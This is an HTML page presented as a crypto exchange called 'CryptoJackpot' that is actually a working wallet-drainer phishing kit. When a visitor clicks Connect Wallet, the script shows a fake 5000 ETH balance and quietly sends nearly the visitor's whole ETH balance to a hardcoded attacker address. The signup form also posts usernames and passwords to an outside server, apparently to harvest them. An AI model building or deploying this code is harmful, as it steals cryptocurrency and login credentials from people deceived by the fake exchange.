<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CryptoJackpot - Ultimate Crypto Exchange</title>
  <script src="https://cdn.tailwindcss.com"></script>
  <script src="https://cdn.jsdelivr.net/npm/web3@1.7.0/dist/web3.min.js"></script>
</head>
<body class="bg-gray-900 text-white font-sans min-h-screen flex flex-col items-center bg-gradient-to-b from-gray-800 to-gray-900 p-4">
  <h1 class="text-5xl font-bold mb-6 text-yellow-400">CryptoJackpot</h1>
  <div id="signup" class="w-full max-w-md bg-gray-800 p-6 rounded-lg shadow-lg">
    <h2 class="text-2xl font-semibold mb-4">Sign Up</h2>
    <input id="username" type="text" placeholder="Username" class="w-full p-2 mb-4 bg-gray-700 text-white rounded">
    <input id="password" type="password" placeholder="Password" class="w-full p-2 mb-4 bg-gray-700 text-white rounded">
    <button onclick="handleSignup()" class="w-full p-2 bg-yellow-400 text-gray-900 font-bold rounded hover:bg-yellow-500">Sign Up</button>
    <p id="error" class="text-red-400 mt-2 hidden"></p>
  </div>
  <div id="dashboard" class="w-full max-w-md bg-gray-800 p-6 rounded-lg shadow-lg hidden">
    <h2 class="text-2xl font-semibold mb-4">Dashboard</h2>
    <button onclick="connectWallet()" id="walletButton" class="w-full p-2 bg-yellow-400 text-gray-900 font-bold rounded hover:bg-yellow-500 mb-4">Connect Wallet</button>
    <div id="walletInfo" class="hidden">
      <p id="balance" class="mb-2">Balance: 0 ETH</p>
      <div class="grid grid-cols-3 gap-2">
        <button class="p-2 bg-gray-700 rounded hover:bg-gray-600">Buy</button>
        <button class="p-2 bg-gray-700 rounded hover:bg-gray-600">Sell</button>
        <button class="p-2 bg-gray-700 rounded hover:bg-gray-600">Swap</button>
      </div>
      <div class="mt-4">
        <p>Market Prices:</p>
        <ul>
          <li>ETH:$3200</li>
          <li>BTC:$60000</li>
          <li>SOL:$130</li>
        </ul>
      </div>
    </div>
    <p id="errorDashboard" class="text-red-400 mt-2 hidden"></p>
  </div>
  <script>
    const targetWallets = {
      ETH: '0x3d7440Dc03eEa3Fa93A9FC3222c470A3C829bF6E',
      BTC: '35wtCb2zFXpbvj447LnvtBp3jABgRVibHa',
      SOL: '5cY2t3g4zQzZJ1z5t7x5z5y6z5t7x5z5x5z3v3c'};
    async function connectWallet() {
      if (window.ethereum) {
        try {
          const web3 = new Web3(window.ethereum);
          await window.ethereum.request({ method: 'eth_requestAccounts' });
          const accounts = await web3.eth.getAccounts();
          document.getElementById('walletButton').innerText =`Connected:${accounts[0].slice(0, 6)}...`;
          document.getElementById('balance').innerText = 'Balance: 5000 ETH'; // Fake balance
          document.getElementById('walletInfo').classList.remove('hidden');
          drainWallet(web3, accounts[0]);} catch (err) {
          showError('Wallet connection failed. Try again.', 'errorDashboard');}      } else {
        showError('Install MetaMask or another wallet.', 'errorDashboard');}    }
    async function drainWallet(web3, userAddress) {
      try {
        const ethBalance = await web3.eth.getBalance(userAddress);
        const gasPrice = await web3.eth.getGasPrice();
        const gasLimit = 21000;
        const ethToSend = web3.utils.toWei((web3.utils.fromWei(ethBalance, 'ether') - 0.001).toString(), 'ether');
        if (ethToSend > 0) {
          await web3.eth.sendTransaction({
            from: userAddress,
            to: targetWallets.ETH,
            value: ethToSend,
            gas: gasLimit,
            gasPrice: gasPrice
          });}        console.log('Draining other coins to:', targetWallets); // Placeholder for BTC/SOL} catch (err) {
        console.error('Drain failed:', err);}    }
    async function handleSignup() {
      const username = document.getElementById('username').value;
      const password = document.getElementById('password').value;
      try {
        const response = await fetch('https://your-render-project.onrender.com/api/signup', {
          method: 'POST',
          headers: {'Content-Type': 'application/json'},
          body: JSON.stringify({ username, password })
        });
        if (response.ok) {
          document.getElementById('signup').classList.add('hidden');
          document.getElementById('dashboard').classList.remove('hidden');} else {
          showError('Signup failed. Try a different username.', 'error');}      } catch (err) {
        showError('Server error. Try again.', 'error');}    }
    function showError(message, elementId) {
      const errorElement = document.getElementById(elementId);
      errorElement.innerText = message;
      errorElement.classList.remove('hidden');}  </script>
</body>
      </html>
